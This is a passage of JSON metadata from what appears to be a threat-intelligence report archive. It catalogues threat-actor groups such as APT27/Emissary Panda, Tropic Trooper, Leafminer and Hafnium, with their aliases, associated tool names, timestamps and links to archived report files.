"c63ab035-f9f2-4723-959b-97a7b98b5942", "created_at": "2023-01-06T13:46:38.298354Z", "updated_at": "2026-04-10T02:00:02.917311Z", "deleted_at": null, "main_name": "APT27", "aliases": [ "BRONZE UNION", "Circle Typhoon", "Linen Typhoon", "TEMP.Hippo", "Budworm", "Lucky Mouse", "G0027", "GreedyTaotie", "Red Phoenix", "Iron Tiger", "Iron Taurus", "Earth Smilodon", "TG-3390", "EMISSARY PANDA", "Group 35", "ZipToken" ], "source_name": "MISPGALAXY:APT27", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "578f8e62-2bb4-4ce4-a8b7-6c868fa29724", "created_at": "2022-10-25T16:07:24.344358Z", "updated_at": "2026-04-10T02:00:04.947834Z", "deleted_at": null, "main_name": "Tropic Trooper", "aliases": [ "APT 23", "Bronze Hobart", "Earth Centaur", "G0081", "KeyBoy", "Operation Tropic Trooper", "Pirate Panda", "Tropic Trooper" ], "source_name": "ETDA:Tropic Trooper", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "ByPassGodzilla", "CHINACHOPPER", "CREDRIVER", "China Chopper", "Chymine", "Darkmoon", "Gen:Trojan.Heur.PT", "KeyBoy", "Neo-reGeorg", "PCShare", "POISONPLUG.SHADOW", "Poison Ivy", "RoyalRoad", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Swor", "TSSL", "USBferry", "W32/Seeav", "Winsloader", "XShellGhost", "Yahoyah", "fscan", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null }, { "id": "3b8b4ed7-e8cc-4a3a-b14d-c8ebf87c0f9c", "created_at": "2023-01-06T13:46:39.062729Z", "updated_at": "2026-04-10T02:00:03.200784Z", "deleted_at": null, "main_name": "Operation Soft Cell", "aliases": [], "source_name": "MISPGALAXY:Operation Soft Cell", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "86182dd7-646c-49c5-91a6-4b62fd2119a7", "created_at": "2025-08-07T02:03:24.617638Z", "updated_at": "2026-04-10T02:00:03.738499Z", "deleted_at": null, "main_name": "BRONZE HOBART", "aliases": [ "APT23", "Earth Centaur ", "KeyBoy ", "Pirate Panda ", "Red Orthrus ", "TA413 ", "Tropic Trooper " ], "source_name": "Secureworks:BRONZE HOBART", "tools": [ "Crowdoor", "DSNGInstaller", "KeyBoy", "LOWZERO", "Mofu", "Pfine", "Sepulcher", "Xiangoop Loader", "Yahaoyah" ], "source_id": "Secureworks", "reports": null }, { "id": "32c8c1a1-ae5c-4a05-a95d-2e970a46cd1e", "created_at": "2022-10-25T16:07:23.777999Z", "updated_at": "2026-04-10T02:00:04.747552Z", "deleted_at": null, "main_name": "Leafminer", "aliases": [ "Flash Kitten", "G0077", "Leafminer", "Raspite" ], "source_name": "ETDA:Leafminer", "tools": [ "Imecab", "LaZagne", "Mimikatz", "PhpSpy", "Sorgu" ], "source_id": "ETDA", "reports": null }, { "id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43", "created_at": "2025-08-07T02:03:24.68371Z", "updated_at": "2026-04-10T02:00:03.64323Z", "deleted_at": null, "main_name": "BRONZE UNION", "aliases": [ "APT27 ", "Bowser", "Budworm ", "Circle Typhoon ", "Emissary Panda ", "Group35", "Iron Tiger ", "Linen Typhoon ", "Lucky Mouse ", "TG-3390 ", "Temp.Hippo " ], "source_name": "Secureworks:BRONZE UNION", "tools": [ "AbcShell", "China Chopper", "EAGERBEE", "Gh0st RAT", "OwaAuth", "PhantomNet", "PoisonIvy", "Sysupdate", "Wonknu", "Wrapikatz", "ZxShell", "reGeorg" ], "source_id": "Secureworks", "reports": null }, { "id": "578e92ed-3eda-45ef-b4bb-b882ec3dbb62", "created_at": "2025-08-07T02:03:24.604463Z", "updated_at": "2026-04-10T02:00:03.798481Z", "deleted_at": null, "main_name": "BRONZE GENEVA", "aliases": [ "APT30 ", "BRONZE STERLING ", "CTG-5326 ", "Naikon ", "Override Panda ", "RADIUM ", "Raspberry Typhoon" ], "source_name": "Secureworks:BRONZE GENEVA", "tools": [ "Lecna Downloader", "Nebulae", "ShadowPad" ], "source_id": "Secureworks", "reports": null }, { "id": "529c1ae9-4579-4245-86a6-20f4563a695d", "created_at": "2022-10-25T16:07:23.702006Z", "updated_at": "2026-04-10T02:00:04.71708Z", "deleted_at": null, "main_name": "Hafnium", "aliases": [ "G0125", "Murky Panda", "Red Dev 13", "Silk Typhoon" ], "source_name": "ETDA:Hafnium", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "5c13338b-eaed-429a-9437-f5015aa98276", "created_at": "2022-10-25T16:07:23.582715Z", "updated_at": "2026-04-10T02:00:04.675765Z", "deleted_at": null, "main_name": "Emissary Panda", "aliases": [ "APT 27", "ATK 15", "Bronze Union", "Budworm", "Circle Typhoon", "Earth Smilodon", "Emissary Panda", "G0027", "Group 35", "Iron Taurus", "Iron Tiger", "Linen Typhoon", "LuckyMouse", "Operation DRBControl", "Operation Iron Tiger", "Operation PZChao", "Operation SpoiledLegacy", "Operation StealthyTrident", "Red Phoenix", "TEMP.Hippo", "TG-3390", "ZipToken" ], "source_name": "ETDA:Emissary Panda", "tools": [ "ASPXSpy", "ASPXTool", "Agent.dhwf", "AngryRebel", "Antak", "CHINACHOPPER", "China Chopper", "Destroy RAT", "DestroyRAT", "FOCUSFJORD", "Farfli", "Gh0st RAT", "Ghost RAT", "HTTPBrowser", "HTran", "HUC Packet Transmit Tool", "HighShell", "HttpBrowser RAT", "HttpDump", "HyperBro", "HyperSSL", "HyperShell", "Kaba", "Korplug", "LOLBAS", "LOLBins", "Living off the Land", "Mimikatz", "Moudour", "Mydoor", "Nishang", "OwaAuth", "PCRat", "PlugX", "ProcDump", "PsExec", "RedDelta", "SEASHARPEE", "Sensocode", "SinoChopper", "Sogu", "SysUpdate", "TIGERPLUG", "TVT", "Thoper", "Token Control", "TokenControl", "TwoFace", "WCE", "Windows Credential Editor", "Windows Credentials Editor", "Xamtrav", "ZXShell", "gsecdump", "luckyowa" ], "source_id": "ETDA", "reports": null }, { "id": "236429ce-6355-43f6-9b58-e6803a1df3f4", "created_at": "2026-03-16T02:02:50.60344Z", "updated_at": "2026-04-10T02:00:03.641587Z", "deleted_at": null, "main_name": "Bronze Union", "aliases": [ "Circle Typhoon ", "Emissary Panda " ], "source_name": "Secureworks:Bronze Union", "tools": [ "China Chopper", "OwaAuth", "Sysupdate" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434620, "ts_updated_at": 1775792241, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/f4daa44acca79a8008c87139d620169459af59a0.pdf", "text": "https://archive.orkl.eu/f4daa44acca79a8008c87139d620169459af59a0.txt", "img": "https://archive.orkl.eu/f4daa44acca79a8008c87139d620169459af59a0.jpg" } }